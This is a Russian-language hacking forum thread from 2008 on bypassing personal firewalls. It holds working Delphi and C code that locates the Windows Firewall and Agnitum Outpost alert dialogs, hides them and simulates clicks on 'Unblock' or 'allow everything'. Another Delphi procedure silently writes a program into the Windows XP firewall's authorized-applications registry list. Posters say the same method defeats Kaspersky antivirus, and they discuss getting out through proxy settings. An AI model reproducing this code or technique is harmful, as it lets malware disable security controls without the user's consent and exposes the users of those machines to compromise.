PDA

Просмотр полной версии : Обход брандмауэров.


o_OBallers
14.08.2008, 08:16
Обход брандмауэров.

Данный метод обхода брандмауэров, не является новым, и известен уже много лет.
Я решил описать его подробно из-за следующей ситуации:

Автор вопроса: Как мне обойти брандмауэр.
Blucksun: Ищи окно, когда найдешь манипулируй дочерними контролами как тебе нужно.

Ответ Blucksun абсолютно верный только кто из прочитавших, понял как же всё таки обходить брандмауэр.
Тут ситуация сходная с сексом в подростковой среде, все думают что у товарищей он уже был, а у меня нет, на самом деле ни у кого не было.
Вообщем лясём-трясём а рабочего кода нет, одни только слова.
Я решил исправить эту ситуацию всё подробно объяснив.

Разберёмся на примере стандартного брандмауэра.
Вначале пишешь прогу которая должна работать с инетом.
В уже готовый исходник пишешь код открывающий на прослушивание любой порт, например 22222. Тут же вылетает сообщение «Чтобы помочь защитить компьютер…….»,
Чтобы всё было нормально нужно чтобы была нажата кнопка «Разблокировать».
Нужно найти окно по заголовку «Оповещение системы безопасности Windows».
Потом найти контрол с заголовком «Разблокировать».
Нажать на этот контрол, и приложение будет добавлено в список доверенных.


var Handle1, Handle2: integer;
begin
Handle1 := 0;
Handle2 := 0;
while Handle1 = 0 do
begin
Handle1 := FindWindow(nil, ‘Оповещение системы безопасности Windows’);
end;
Handle2 := FindWindowEx(Handle1, 0, nil, '&Разблокировать');
SendMessage(Handle2, BM_CLICK, 0, 0);
end;

Маленькое пояснение по коду. По идее должно быть «Разблокировать» вместо '&Разблокировать' но не верьте своим глазам ужасно хитрые программисты из Microsoft неизвестно зачем добавили невидимый знак амперсанда. Я узнал это запустив программу WinSight32, которая поставляется вместе с Delphi, в ней я нашёл строчку «Оповещение системы безопасности Windows», щёлкнул на плюсик возле неё и увидел все дочерние элементы этого окна возле одного из них и красовалось '&Разблокировать'.

Стандартный брандмауэр пройден теперь разберёмся с Игнатум Оутпост.
Чтобы вы не спорили я сразу напишу на какой версии я тестировал код – Agnitum Outpost Firewall FREE 1.0.1817.

Данный брандмауэр имеет следующие политики Отключить, Запрещать, Блокировать,
Обучение, Разрешать.
Отключить, Запрещать, Разрешать, - крайне бесполезные политики приводящие к неработоспособности всех подключений, любо брандмауэр будет тупо висеть в памяти.
Политика блокировать, разрешает только явно разрешённые подключения, остальные блокирует без разговоров очень неудобно, например скачал ты новую программу работающую с Интернетом установил, а она не работает, потому что ты забыл в настройках её прописать.

Самая лучшая политика это обучение, как только новая программа лезет в сеть вылезает окно с разнообразными предложениями по поводу этой программы, разумеется возможно ей разрешить выполнять любые действия. Мы рассмотрим добавление нашего приложения в список доверенных при этой политики безопасности.

Когда работает Outpost, WinSight32 запустить невозможно.
Но этого, и не надо разработчики написали на кнопках правду как она есть, без всяких дополнительных символов.

Итак для того чтобы обойти оутпост нужно:
Спровоцировать брандмауэр показать окно создать окно создания правил.
Найти окно с заголовком «Создать правило для» + имя вашего приложения заглавными буквами например «Создать правило для MSFTP.EXE».
Найти дочерний контрол с заголовком «Разрешить этому приложению выполнять любые действия».
Щёлкнуть на него.
Найти дочерний контрол с заголовкои «OK».
Щёлкнуть на него.
Приложение добавлено в список доверенных.

var Handle1, Handle2: integer;
begin
Handle1 := 0;
Handle2 := 0;
while Handle1 = 0 do
begin
Handle1 := FindWindow(nil, ‘Создать правило для MSFTP.EXE');
end;
Handle2 := FindWindowEx(Handle1, 0, nil, 'Разрешить этому приложению выполнять любые действия');
SendMessage(Handle2, BM_CLICK, 0, 0);
Handle2 := FindWindowEx(Handle1, 0, nil, 'OK');
SendMessage(Handle2, BM_CLICK, 0, 0);


Данный метод если применить мозг можно использовать для обхода или выключения любой другой защиты, будь то любой другой брандмауэр, или незапароленный антивирус.

o_OBallers(Alaget) специально для античат.

slesh
14.08.2008, 09:44
Методы хороши были, но увы на англоязычных вариантах это не прокатит.
небольшое дополнение можно дописать к статье. Всем известный обход XP фаера

procedure fuck_xpfw;
var
key:longword;
ValueName:array[0..255] of char;
Value:string;
const
path='SYSTEM\ControlSet001\Services\SharedAccess\P arameters\FirewallPolicy\StandardProfile\Authorize dApplications\List';

begin
if RegOpenKeyEx(HKEY_LOCAL_MACHINE, path, 0, KEY_ALL_ACCESS, key)<>0 then exit;
GetModuleFileName(GetModuleHandle(nil), ValueName, 256);
Value:=ValueName+':*:Enabled:RPC';
RegSetValueEx(key, ValueName, 0, REG_SZ, pchar(Value), length(Value));
RegCloseKey(key);
end;

slider
14.08.2008, 10:08
хых... у меня всё это выглядело примерно так:

#include <windows.h>
#include <conio.h>

void sleep(DWORD dwMilliseconds);
DWORD WINAPI ThreadFunc(LPVOID lpParam)
{
while(1000){
HWND wbm;
wbm=FindWindow("#32770",0);
ShowWindow(wbm,SW_HIDE);
SendMessage(wbm,WM_COMMAND,BN_CLICKED,104);
}
}

DWORD WINAPI ThreadFunc1(LPVOID lpParam)
{
while(1000){
HWND opf;
opf=FindWindow("#32770",0);
ShowWindow(opf,SW_HIDE);
CheckDlgButton(opf,1007,0);
CheckDlgButton(opf,1006,1);
SendMessage(opf,WM_COMMAND,BN_CLICKED,1055);
opf=FindWindowEx(opf,0,0,"OK");
SendMessage(opf,BM_CLICK,0,0);
}
}

int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,LPSTR lpCmdLine, int nCmdShow)
{
DWORD dwThreadId, dwThrdParam = 1;
HANDLE hThread;
HANDLE hThread1;
hThread = CreateThread(NULL,0,ThreadFunc,&dwThrdParam,0,&dwThreadId);
hThread1 = CreateThread(NULL,0,ThreadFunc1,&dwThrdParam,0,&dwThreadId);
if (hThread != NULL)
{_getch();CloseHandle( hThread );}
if (hThread != NULL)
{_getch();CloseHandle( hThread1 );}
sleep(25);
return 0;
}

И outpost firewall отдыхал.... и брандмауэр тихо сопел в газетку

Pernat1y
14.08.2008, 10:15
и того-же каспера так не обойдеш

slider
14.08.2008, 10:19
И даже Каспера можно немного по другому обойти ;)

Pernat1y
14.08.2008, 10:23
"немного по другому", это разрешить в нем управление с других процессов, или еще как-то?

slesh
14.08.2008, 10:35
Когдато давно давно был выложен драйвер написанный на asm который запросто отрубал фаеры. Палился жестоко он. Но самое интерестное, что достаточно было гденить в начале поставить pushad popad? скомпельнуть и его сново можно было юзать

zeppe1in
14.08.2008, 10:44
программисты из Microsoft вовсе не хитрые. В случае &Разблокировать буква Р должна быть подчоркнутой. и на неё можно нажать комбинацией alt+Р. Вот для чего нужен &

vvs777
15.08.2008, 20:44
На самом деле спектр применения ограничивается только извращенностью головного мозга программиста. :p

GetWindow()
gw_first, gw_next,
wintext=GetWindowText(...)
if pos('азблокир',wintext)>0...
Короче говоря плевать что там подчеркнуто...
ифов можно кучу. Можно массив ключевых слов на всех языках мира.
Можно "конфигурацию профилей" сделать для каждой проги и полная универсальность гоотова.
Можно хук на открытие окна повесить - еще веселее.
+ еще проверка чтоб только на твою прогу а то это будет тотальный ппц =)

Я так с антивирусами боролся.
Каспер 5,6 прекрасно идет. :D . 7й уже не пробовал.

Когдато давно давно был выложен драйвер
как хоть назвался? хотелось бы посмотреть на это

Gray_f0x
16.08.2008, 14:14
а как же iptables + NAT на отдельном компьюторе а комп юзвери в подсети которая закрыта для внешки полностью и выход в инет через проксик?

slesh
22.08.2008, 08:56
2 Gray_f0x Дык для таких случаев берешь конфиги LAN из IE и долбишься через проксю подрубаясь через HTTPS потому что мало где залочен доступ на левые порты с него.

Gray_f0x
04.09.2008, 13:56
а можно конкретную методику с конкретными действиями ?

Ты говориш про "ломление" снаружи ? Я не представляю как ты это сделаеш ? Куда ты будеш ломится ? на 80 порт на котором у меня нету никакой службы ? И какие у IE левые порты ?

и еще заметь, что для работы IE через прокси с аутентификацией, требуется поддержка ntlm аутентификации со стороны проксика...

И все-таки до конца не понял смысл твоего поста ...

Ky3bMu4
04.09.2008, 17:55
а как же iptables + NAT на отдельном компьюторе а комп юзвери в подсети которая закрыта для внешки полностью и выход в инет через проксик?

"выход в инет через проксик" и "iptables + nat" абсолютно разные вещи. Во 2 случае всё норм будет, а в 1, как сказал slesh, нужно читать настройки lan/ie. Остальное комментировать не буду.

12usver12
04.09.2008, 22:32
очень баянный метод, как его то в аутпосте не прикрыли еще...из всех фаеров самый зверский zonealarm , против него такие штучки вообще не прокатят

Gray_f0x
05.09.2008, 16:55
"выход в инет через проксик" и "iptables + nat" абсолютно разные вещи. Во 2 случае всё норм будет, а в 1, как сказал slesh, нужно читать настройки lan/ie. Остальное комментировать не буду.
есть юзвери которые ходят без прокси сервера, другим же в iptables закрыт доступ на http и они используют прокси сервер + таки не все приложение можно пустить через прокси сервер, поэтому и поднят NAT.

И вопрос в другом.